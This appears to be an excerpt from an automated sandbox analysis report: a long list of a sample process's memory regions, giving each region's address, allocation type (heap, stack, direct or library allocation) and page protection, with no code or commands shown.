heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
4FFC000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
5187000
|
heap
|
page read and write
|
||
CC1000
|
direct allocation
|
page execute and read and write
|
||
5194000
|
heap
|
page read and write
|
||
4E79000
|
heap
|
page read and write
|
||
5065000
|
heap
|
page read and write
|
||
4E43000
|
heap
|
page read and write
|
||
4800000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
4DAF000
|
heap
|
page read and write
|
||
4D71000
|
heap
|
page read and write
|
||
4D81000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
5074000
|
heap
|
page read and write
|
||
5090000
|
heap
|
page read and write
|
||
4F80000
|
heap
|
page read and write
|
||
4DCE000
|
heap
|
page read and write
|
||
4F1E000
|
heap
|
page read and write
|
||
39B000
|
heap
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
3FC000
|
heap
|
page read and write
|
||
4DE5000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4F85000
|
heap
|
page read and write
|
||
5006000
|
heap
|
page read and write
|
||
19A000
|
heap
|
page read and write
|
||
12E59000
|
trusted library allocation
|
page read and write
|
||
3D6C000
|
stack
|
page read and write
|
||
4B74000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
377A000
|
heap
|
page read and write
|
||
7FE89C09000
|
trusted library allocation
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
5027000
|
heap
|
page read and write
|
||
5079000
|
heap
|
page read and write
|
||
43F000
|
heap
|
page read and write
|
||
50CF000
|
heap
|
page read and write
|
||
47F000
|
heap
|
page read and write
|
||
4EC2000
|
heap
|
page read and write
|
||
4E43000
|
heap
|
page read and write
|
||
4D88000
|
heap
|
page read and write
|
||
519B000
|
heap
|
page read and write
|
||
4D57000
|
heap
|
page read and write
|
||
4FAC000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
4FA6000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
500E000
|
heap
|
page read and write
|
||
36C000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
4E76000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
50D4000
|
heap
|
page read and write
|
||
34C000
|
heap
|
page read and write
|
||
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
501F000
|
heap
|
page read and write
|
||
262000
|
heap
|
page read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
2BDB000
|
trusted library allocation
|
page read and write
|
||
386000
|
heap
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page read and write
|
||
1FF0000
|
heap
|
page read and write
|
||
4DAB000
|
heap
|
page read and write
|
||
4E40000
|
heap
|
page read and write
|
||
47E000
|
heap
|
page read and write
|
||
7FE8B534000
|
trusted library allocation
|
page read and write
|
||
4F0B000
|
heap
|
page read and write
|
||
1C29F000
|
stack
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
4D6C000
|
heap
|
page read and write
|
||
1F2D000
|
stack
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
4DB6000
|
heap
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
509D000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
4F98000
|
heap
|
page read and write
|
||
4E3000
|
heap
|
page read and write
|
||
358000
|
heap
|
page read and write
|
||
4EEC000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
24B1000
|
trusted library allocation
|
page read and write
|
||
A0000
|
trusted library allocation
|
page read and write
|
||
50FB000
|
heap
|
page read and write
|
||
7FE8B5E0000
|
trusted library allocation
|
page read and write
|
||
3802000
|
trusted library allocation
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
4D58000
|
heap
|
page read and write
|
||
4DD6000
|
heap
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
508C000
|
heap
|
page read and write
|
||
4D43000
|
heap
|
page read and write
|
||
4D9F000
|
heap
|
page read and write
|
||
4EEF000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4F9F000
|
heap
|
page read and write
|
||
4E5A000
|
heap
|
page read and write
|
||
54D5000
|
heap
|
page read and write
|
||
4E0B000
|
heap
|
page read and write
|
||
3A3000
|
direct allocation
|
page read and write
|
||
1BE0000
|
heap
|
page read and write
|
||
504A000
|
heap
|
page read and write
|
||
34F000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
4D85000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
4F2D000
|
heap
|
page read and write
|
||
4EF3000
|
heap
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
4D4F000
|
heap
|
page read and write
|
||
505B000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
1B0000
|
trusted library allocation
|
page read and write
|
||
118000
|
heap
|
page read and write
|
||
4F65000
|
heap
|
page read and write
|
||
4D96000
|
heap
|
page read and write
|
||
50E0000
|
heap
|
page read and write
|
||
5022000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
516D000
|
heap
|
page read and write
|
||
501F000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
2B80000
|
trusted library allocation
|
page execute read
|
||
4D62000
|
heap
|
page read and write
|
||
4ED2000
|
heap
|
page read and write
|
||
4E8E000
|
heap
|
page read and write
|
||
1162000
|
unkown
|
page execute read
|
||
4EE9000
|
heap
|
page read and write
|
||
4E04000
|
heap
|
page read and write
|
||
4E3F000
|
heap
|
page read and write
|
||
374000
|
heap
|
page read and write
|
||
4E4E000
|
heap
|
page read and write
|
||
4E54000
|
heap
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
396000
|
heap
|
page read and write
|
||
4F80000
|
heap
|
page read and write
|
||
5188000
|
heap
|
page read and write
|
||
50FB000
|
heap
|
page read and write
|
||
50E1000
|
heap
|
page read and write
|
||
1AFCF000
|
stack
|
page read and write
|
||
50B6000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
508D000
|
heap
|
page read and write
|
||
4B6F000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
4E58000
|
heap
|
page read and write
|
||
49FF000
|
heap
|
page read and write
|
||
B44000
|
direct allocation
|
page execute and read and write
|
||
441000
|
heap
|
page read and write
|
||
4F9A000
|
heap
|
page read and write
|
||
4B71000
|
heap
|
page read and write
|
||
321000
|
heap
|
page read and write
|
||
4FA9000
|
heap
|
page read and write
|
||
4EE4000
|
heap
|
page read and write
|
||
504F000
|
heap
|
page read and write
|
||
4E5A000
|
heap
|
page read and write
|
||
7FE898C0000
|
trusted library allocation
|
page read and write
|
||
508B000
|
heap
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
50AB000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
5198000
|
heap
|
page read and write
|
||
500B000
|
heap
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
4D67000
|
heap
|
page read and write
|
||
4DFB000
|
heap
|
page read and write
|
||
1C5FE000
|
stack
|
page read and write
|
||
517C000
|
heap
|
page read and write
|
||
3BD000
|
direct allocation
|
page read and write
|
||
4E49000
|
heap
|
page read and write
|
||
4DDE000
|
heap
|
page read and write
|
||
43D000
|
heap
|
page read and write
|
||
4E22000
|
heap
|
page read and write
|
||
5187000
|
heap
|
page read and write
|
||
34C000
|
heap
|
page read and write
|
||
4E96000
|
heap
|
page read and write
|
||
4E01000
|
heap
|
page read and write
|
||
4E4B000
|
heap
|
page read and write
|
||
4F1B000
|
heap
|
page read and write
|
||
4EB9000
|
heap
|
page read and write
|
||
8F0000
|
trusted library section
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
7FE8B650000
|
trusted library allocation
|
page execute and read and write
|
||
4B76000
|
heap
|
page read and write
|
||
4FD1000
|
heap
|
page read and write
|
||
4DA5000
|
heap
|
page read and write
|
||
4FAE000
|
heap
|
page read and write
|
||
505F000
|
heap
|
page read and write
|
||
4DE6000
|
heap
|
page read and write
|
||
4E78000
|
heap
|
page read and write
|
||
4E3C000
|
heap
|
page read and write
|
||
3A1000
|
heap
|
page read and write
|
||
4DF3000
|
heap
|
page read and write
|
||
4E21000
|
heap
|
page read and write
|
||
4FF6000
|
heap
|
page read and write
|
||
4E54000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
38B000
|
heap
|
page read and write
|
||
1C2ED000
|
heap
|
page read and write
|
||
124B1000
|
trusted library allocation
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
5036000
|
heap
|
page read and write
|
||
506A000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
3B5A000
|
trusted library allocation
|
page read and write
|
||
4F35000
|
heap
|
page read and write
|
||
3915000
|
trusted library allocation
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4FC4000
|
heap
|
page read and write
|
||
50FC000
|
heap
|
page read and write
|
||
51AE000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
4FFE000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
4D75000
|
heap
|
page read and write
|
||
4E2A000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
4D5B000
|
heap
|
page read and write
|
||
4B76000
|
heap
|
page read and write
|
||
4DE6000
|
heap
|
page read and write
|
||
235F000
|
stack
|
page read and write
|
||
4E08000
|
heap
|
page read and write
|
||
516C000
|
heap
|
page read and write
|
||
4EA8000
|
heap
|
page read and write
|
||
50E1000
|
heap
|
page read and write
|
||
1A79E000
|
heap
|
page read and write
|
||
4DA8000
|
heap
|
page read and write
|
||
D40000
|
direct allocation
|
page execute and read and write
|
||
4D74000
|
heap
|
page read and write
|
||
4EFF000
|
heap
|
page read and write
|
||
5044000
|
heap
|
page read and write
|
||
4DCB000
|
heap
|
page read and write
|
||
500F000
|
heap
|
page read and write
|
||
4FD1000
|
heap
|
page read and write
|
||
1C2D2000
|
heap
|
page read and write
|
||
347000
|
heap
|
page read and write
|
||
4DAC000
|
heap
|
page read and write
|
||
423000
|
heap
|
page read and write
|
||
5015000
|
heap
|
page read and write
|
||
4D53000
|
heap
|
page read and write
|
||
5072000
|
heap
|
page read and write
|
||
36AC000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
4E33000
|
heap
|
page read and write
|
||
4DD3000
|
heap
|
page read and write
|
||
5182000
|
heap
|
page read and write
|
||
4E78000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
5042000
|
heap
|
page read and write
|
||
506F000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
4EF3000
|
heap
|
page read and write
|
||
4E73000
|
heap
|
page read and write
|
||
7FE8B54D000
|
trusted library allocation
|
page execute and read and write
|
||
36B2000
|
heap
|
page read and write
|
||
502D000
|
heap
|
page read and write
|
||
4DC5000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
4FCB000
|
heap
|
page read and write
|
||
4E89000
|
heap
|
page read and write
|
||
392000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
4E09000
|
heap
|
page read and write
|
||
4D7B000
|
heap
|
page read and write
|
||
4E8F000
|
heap
|
page read and write
|
||
4EEE000
|
heap
|
page read and write
|
||
1C90A000
|
stack
|
page read and write
|
||
1FB3000
|
direct allocation
|
page read and write
|
||
4E8E000
|
heap
|
page read and write
|
||
50D4000
|
heap
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
1D37F000
|
stack
|
page read and write
|
||
4EFB000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
4D86000
|
heap
|
page read and write
|
||
397000
|
heap
|
page read and write
|
||
50FD000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
5178000
|
heap
|
page read and write
|
||
502F000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
503A000
|
heap
|
page read and write
|
||
46C000
|
heap
|
page read and write
|
||
4D45000
|
heap
|
page read and write
|
||
4EC7000
|
heap
|
page read and write
|
||
386000
|
heap
|
page read and write
|
||
4DAD000
|
heap
|
page read and write
|
||
3214000
|
trusted library allocation
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
4E8C000
|
heap
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
4EC6000
|
heap
|
page read and write
|
||
35B000
|
heap
|
page read and write
|
||
50AB000
|
heap
|
page read and write
|
||
7FE8B58C000
|
trusted library allocation
|
page execute and read and write
|
||
2D8000
|
heap
|
page read and write
|
||
4FBD000
|
heap
|
page read and write
|
||
4DAF000
|
heap
|
page read and write
|
||
50E9000
|
heap
|
page read and write
|
||
502E000
|
heap
|
page read and write
|
||
518C000
|
heap
|
page read and write
|
||
4FB7000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
3A2000
|
heap
|
page read and write
|
||
F4000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
4ED3000
|
heap
|
page read and write
|
||
4B71000
|
heap
|
page read and write
|
||
7FE8B700000
|
trusted library allocation
|
page read and write
|
||
5073000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
4E8A000
|
heap
|
page read and write
|
||
4DF8000
|
heap
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
158000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
4F8B000
|
heap
|
page read and write
|
||
4EE2000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
4B21000
|
heap
|
page read and write
|
||
4E73000
|
heap
|
page read and write
|
||
4E45000
|
heap
|
page read and write
|
||
4F81000
|
heap
|
page read and write
|
||
38B000
|
heap
|
page read and write
|
||
3B9000
|
heap
|
page read and write
|
||
4DA3000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
4DF3000
|
heap
|
page read and write
|
||
4F81000
|
heap
|
page read and write
|
||
4FDB000
|
heap
|
page read and write
|
||
3C9000
|
heap
|
page read and write
|
||
7FE89956000
|
trusted library allocation
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
4B41000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
4B41000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
4D8B000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
4F9A000
|
heap
|
page read and write
|
||
4D61000
|
heap
|
page read and write
|
||
4DBA000
|
heap
|
page read and write
|
||
4E18000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
4E0F000
|
heap
|
page read and write
|
||
4B45000
|
heap
|
page read and write
|
||
5012000
|
heap
|
page read and write
|
||
5065000
|
heap
|
page read and write
|
||
4FBD000
|
heap
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
4D70000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
4D72000
|
heap
|
page read and write
|
||
342000
|
heap
|
page read and write
|
||
506E000
|
heap
|
page read and write
|
||
5022000
|
heap
|
page read and write
|
||
4EB9000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
2F63000
|
trusted library allocation
|
page read and write
|
||
399000
|
heap
|
page read and write
|
||
7FE898FC000
|
trusted library allocation
|
page execute and read and write
|
||
5045000
|
heap
|
page read and write
|
||
4AF2000
|
heap
|
page read and write
|
||
B50000
|
direct allocation
|
page execute and read and write
|
||
5015000
|
heap
|
page read and write
|
||
5066000
|
heap
|
page read and write
|
||
50EA000
|
heap
|
page read and write
|
||
4DD5000
|
heap
|
page read and write
|
||
4F8A000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
508C000
|
heap
|
page read and write
|
||
4B48000
|
heap
|
page read and write
|
||
5059000
|
heap
|
page read and write
|
||
51A9000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
457000
|
heap
|
page read and write
|
||
4EC2000
|
heap
|
page read and write
|
There are 2053 hidden memdumps, click here to show them.